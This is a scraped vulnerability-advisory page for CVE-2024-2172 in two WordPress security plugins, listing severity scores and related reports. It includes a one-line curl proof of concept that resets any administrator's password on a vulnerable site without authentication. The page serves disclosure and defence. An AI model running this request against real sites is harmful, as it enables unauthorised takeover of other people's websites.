Lucene search
WpvulndbWPEX-ID:D95F761F-5385-482A-8C69-560E920267AFHistoryMar 13, 2024 - 12:00 a.m.
Malware Scanner < 4.7.3 and Web Application Firewall < 2.1.2 - Unauthenticated Privilege Escalation
2024-03-1300:00:00
wpvulndb
33
malware scanner
web application firewall
unauthenticated privilege escalation
vulnerable site
change password exploit
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
15.7%
Description The plugin does not prevent unauthenticated users from resetting any account’s password, allowing them to takeover sites by resetting one of its administrators’ password.
curl --url 'http://vulnerable-site.tld/wp-login.php' --data 'option=mo_wpns_change_password&username=simpleadmin&new_password=P4ssw0rd!&confirm_password=P4ssw0rd!'Related
wpvulndb
wpvulndb
wordfence
wordfence
cvelist
cvelist
CVE-2024-2172
2024-03-13 15:26:53
prion
prion
Privilege escalation
2024-03-13 16:15:00
hivepro
hivepro
Critical Flaw In WordPress Plugins Poses Risk Of Site Takeover
2024-03-21 05:46:52
cve
cve
CVE-2024-2172
2024-03-13 16:15:32
nvd
nvd
CVE-2024-2172
2024-03-13 16:15:32
thn
thn
WordPress Admins Urged to Remove miniOrange Plugins Due to Critical Flaw
2024-03-18 09:46:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
15.7%
Related for WPEX-ID:D95F761F-5385-482A-8C69-560E920267AF